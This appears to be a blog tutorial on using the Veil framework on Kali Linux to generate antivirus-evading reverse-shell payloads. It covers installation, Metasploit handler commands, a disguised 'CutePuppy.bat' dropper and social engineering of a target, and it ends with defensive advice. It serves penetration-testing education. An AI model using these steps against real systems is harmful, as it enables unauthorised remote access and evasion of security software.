Anti-Virus Bypass with Veil on Kali Linux

One of the common hurdles of Ethical Hackers and Penetration Testers is bypassing anti-virus on target systems. Veil uses a Metasploit like interface to create a remote shell program that will bypass most Anti-Virus programs. A little social engineering is required to get the target to run the resultant shell program, but if they do, it will connect back to the Kali system and allow the attacker to have full remote access.

In this article we will discuss how to install and run Veil on Kali Linux. Since the previous version of this article there have been several changes to Veil. The first is that it is now much easier to install and run Veil on Kali Linux. Veil directly supports Kali 2018 and installs by only running two commands. Another change is that Veil includes new payloads written for additional languages.

Read more about the updates at https://www.veil-framework.com/.

INSTALLING VEIL

Tool GitHub Page: https://github.com/Veil-Framework/Veil

Installing Veil 3.x on Kali 2018 is very simple:

Veil Evasion Kali Linux

The install will then run for a while as the dependency packages are installed. Reboot when finished.

STARTING VEIL

Now let’s look at using Veil.

  • In a terminal window, enter, “veil

AV bypass 1

Veil offers two tools, Evasion and Ordinance. We want to run Veil-Evasion.

  • Enter, “use 1

AV bypass Veil 2

The Veil title menu bar should change to “Veil-Evasion”.

USING VEIL-EVASION

The first thing to do is to list the available payloads using the “list” command.

  • Type “list” and then press enter.

AV bypass 3

PowerShell attacks are very popular, so let’s use a PowerShell payload. Just enter the “use” command and the number of the payload that you want. In this tutorial we will use the “powershell/meterpreter/rev_tcp.py” payload.

  1. Type, “use 22” and hit “enter”.

This will select the payload and present us with the following screen:

bypassing AV 4

If you look at the options, you will notice that it looks (and acts) very similar to using Metasploit modules. For this module we will just need to set the LHOST variable to our Kali system IP address.

2. Type, “set LHOST 192.168.1.39” and then hit “enter”.

3. Now enter, “options” to view the value that we just set:

bypassing AV 5

We will leave the LPORT set to the default value of 4444. Now we just need to generate our shellcode.

4. Enter, “generate

Veil will now generate the shellcode with the options that we chose.

5. Now we need to give our created file a filename or base name, I chose “CutePuppy”.

Veil-Evasion now has all that it needs and creates our shellcode file. We should see something like the following output:

bypassing AV 6

This screen shows what payload was used and also where the output file is located. In this instance, the file was placed in the “/var/lib/veil/output/source/” directory. When it is run on a Windows system, it will try to connect out to our Kali machine. But before we do, we will need to start a Metasploit handler to accept the connection. The handler runs in Metasploit and waits until the shell file (CutePuppy.bat in this instance) is opened. Once it is executed, it creates a remote shell between your Windows system and the Kali box.

GETTING A REMOTE SHELL

To create the remote handler, we will be using Metasploit. You can use the RC file generated by Veil, but I prefer to do it manually.

  1. Start the Metasploit Framework from the Kali Quick Start menu.
  2. Now set up the multi/handler using the following settings:
  • use multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST 192.168.1.39
  • set LPORT 4444
  • exploit

This starts the multi handler on the Kali System:

bypassing AV 7

Now we just need the target computer to run the file that Veil generated.

3. Copy “CutePuppy.bat” to your Windows Desktop:

bypassing AV 8

4. Now, double click on the .bat file to run it.

Nothing appears to happen, but on your Kali system, you should see this:

bypassing AV 9

A reverse shell session!

5. Now if we type “shell”, we see that we do in fact have a complete remote shell:

bypassing AV 10

The big question is, can this bypass anti-virus? At the time of this writing I ran the PowerShell based CutePuppy.bat file on a fully updated Windows 10 system running an updated Anti-Virus and it did detect it as malicious.

Anti-Virus engines have become much better at detecting PowerShell based threats. There are other options you can use in Veil. I will not cover this step by step, but using the “c/meterpreter/rev_tcp.py” payload provided different results.

Generating it into a test.exe file:

bypassing AV 12

We have a shell:

bypassing AV 13

CONCLUSION

Hopefully this article has shown that you cannot trust in your Anti-Virus alone to protect you from online threats. Unfortunately, sometimes your network security depends on your users and what they allow to run. Instruct your users to be very leery of internet links and never open any attachments that they receive in unsolicited e-mails. Blocking certain file types from entering or leaving your network is also a good idea.

Finally, use a Network Security Monitoring system (and logs) to help track down what happened and what was compromised if the worst does happen.

Advertisements

Installing Veil Framework on Kali Linux

I have been notified that they are problems installing Veil Framework (AV bypass) in Kali using the apt-get install command. From the creator’s website it looks like the recommended install is to now clone Veil from the Github repository and then run the included setup routine.

Instructions can be found at the Veil Framework updates page, but I will include a tutorial here.

For advanced users:

$ git clone https://github.com/Veil-Framework/Veil-Evasion.git
$ cd Veil-Evasion/setup/
$ ./setup.sh

Then just follow through the install, taking the defaults.

Step-by-Step Guide

From a Kali terminal prompt type, “git clone https://github.com/Veil-Framework/Veil-Evasion.git. This will clone Veil into the “Veil-Evasion” directory. When done change to the “Veil-Evasion/setup” directory and run “./setup.sh”:

Veil 1

Type, “Y” when prompted to continue with install, then sit back and relax, as the next part can take a while.

At the Python setup screen just click, “Next”:

Veil 2

At the Select Destination Directory screen, leave the default destination and click “Next”, then click “Yes” when prompted to overwrite existing Python files:

Veil 3

Continue through Python install leaving default settings, click “Finish” when done.

The install then begins the pywin32 setup.

At the main pywin32 setup screen, press “Next” to continue:

Veil 4

Leave default values on the Python directory location screen and click “next”, then “next” again, and “finish” to complete install.

The install then begins the pycrypto setup.

At the main pycrypto setup screen, press “Next” to continue:

Veil 5

Again leave the Python information that is populated by default and click “Next”, “next” again and then “Finish” when done.

Setup will then complete. And that is it; we are now ready to run Veil!

Running Veil Evasion

From the Veil-Evasion directory, run “./Veil-Evasion.py”, and you will see the main Veil Screen:

Veil 6

And there you go, you are now all set to use Veil Evasion on Kali Linux!

(** Note: My book, Basic Security Testing with Kali Linux which includes a tutorial on using Veil Evasion, is in the process of being updated to reflect the install tutorial changes.)